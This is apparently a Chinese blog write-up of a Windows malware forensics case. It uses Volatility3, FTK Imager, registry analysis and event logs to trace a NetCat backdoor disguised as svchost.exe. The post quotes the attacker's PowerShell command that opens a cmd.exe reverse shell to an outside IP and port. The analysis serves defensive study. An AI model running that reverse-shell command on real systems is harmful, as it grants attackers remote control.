0xd00 随笔小记

Back

FTK Imager中搜索AutoConnector相关注册表项的截图FTK Imager中搜索AutoConnector相关注册表项的截图

初始环境与取证数据#

memdump.mem  pagefile.sys disk.dd
bash

内存取证分析(Volatility3)#

系统指纹识别#

通过内核版本15.17763确认系统为Windows Server 2019 (1809),系统架构为64位环境,为后续分析提供基础环境上下文。

查看进程信息#

python3 vol.py -f memdump.mem windows.pslist
bash

Volatility3 pslist进程列表截图\n

关键发现:

  • PID 1036的svchost.exe父进程应为services.exe(PID 804),但实际父进程为powershell.exe
  • 进程路径指向非常规目录C:\Tools\svchost.exe(正常路径应为C:\Windows\System32

查看创建进程的命令行#

python3 vol.py -f memdump.mem windows.cmdline
bash
Volatility3 cmdline命令输出截图

svchost.exe 的文件路径并不是默认的 C:\Windows\System32\svchost.exe,而是位于 C:\Tools\ 目录下

很明显这是伪装成系统进程的恶意程序,用于与外部IP地址进行通信。

下面还有一个通过notepad打开的part2.txt文件,文本内容可能通过base64编码。

通过访问part2.txt所在目录,我们还发现了一个connector.ps1文件

Start-Process -NoNewWindow "C:\Tools\svchost.exe" "-e cmd.exe 10.14.74.53 6996"  
C:\Windows\system32\NOTEPAD.EXE $args[0]  
bash

可以得知攻击者用于接收反弹SHELL的IP是10.14.74.53

攻击链重构:

  1. 通过powershell.exe启动伪装成系统服务svchost.exe的NetCat后门
  2. 建立与C2服务器10.14.74.53:6996的反向连接
  3. 利用记事本进程加载加密载荷part2.txt实现载荷分离

使用 FTK Imager 分析磁盘#

定位恶意文件#

查看从内存中找到的文件C:\Tools\svchost.exe

FTK Imager中定位伪造svchost.exe的界面

通过VirusTotal中检测提取的SHA1,可以确认此程序为NetCat工具

VirusTotal中查询伪造svchost SHA1的结果

导出C:\Windows\System32\config下的注册表文件与C:\Users\Bobby\NTUSER.DAT

导入Registry Explorer

因为svhost.exeAutoConnector目录下载,所以尝试在注册表中进行搜索AutoConnector

FTK Imager中搜索包含AutoConnector关键字的注册表项结果 FTK Imager中定位AutoConnector注册表键值的截图 FTK Imager中查看更多AutoConnector相关注册表项的截图

成功定位AutoConnector的位置

使用VirusTotal进行分析

VirusTotal中通过AutoConnector SHA1查询的结果

持久化机制:

  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\bam\State\UserSettings\S-1-5-21-1966530601-...-1008存在恶意启动项
  • 注册表键值指向AutoConnector.exe工具

分析系统日志#

C:\Windows\System32\winevt\Logs\导出事件日志

因为运行的脚本是Powershell脚本,所以仅导入包含Powershell关键字的日志到EventViewer即可

但未搜索到与connector.ps1相关的日志。

动态行为沙箱检测#

导出恶意文件所在文件夹

组策略中开启Turn on PowerShell TransactionTurn on PowerShell Script Block LoggingTurn on Script Execution

组策略中开启PowerShell相关日志配置的截图

运行恶意程序后查看日志

获取到第一部分载荷

EventViewer中查看脚本执行日志的截图

结合之前获取的part2.txt经过base64解码成功获取到原始载荷,确认其为数据渗出的加密密钥。

攻击链全景还原#

阶段技术点取证证据
初始访问
执行服务伪装C:\Tools\svchost.exe进程树异常
持久化注册表自启动Run键值指向恶意后门程序
防御规避日志清除Security.evtx日志时间断层
命令与控制反向ShellNetCat连接10.14.74.53:6996
数据渗出AES加密隧道内存解密Meterpreter配置
恶意软件分析实战:内存取证与磁盘溯源完整案例解析
https://blog.0xd00.com/blog/malware-analysis-memory-forensics-disk-investigation-case-study
Author 0xd00
Published at 2025年3月7日
Comment seems to stuck. Try to refresh?✨